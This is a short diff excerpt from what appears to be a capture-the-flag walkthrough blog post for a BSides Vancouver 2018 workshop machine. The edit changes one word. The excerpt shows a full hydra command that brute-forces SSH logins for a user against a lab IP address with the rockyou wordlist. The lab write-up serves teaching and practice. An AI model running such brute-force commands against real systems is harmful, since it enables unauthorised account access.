limbernie/limbernie.github.io/_posts/2018-06-22-bsides-vancouver-2018-workshop-walkthrough.md

 ### Hail Hydra

-For online brute-force attacks, I like to use `hydra` and the **rockyou** wordlist.
+For online brute-force attack, I like to use `hydra` and the **rockyou** wordlist.
 Here's the command.

 ```
 # hydra -l anne -P /usr/share/wordlists/rockyou.txt -f -e nsr -o hydra.txt -t 4 ssh://192.168.30.129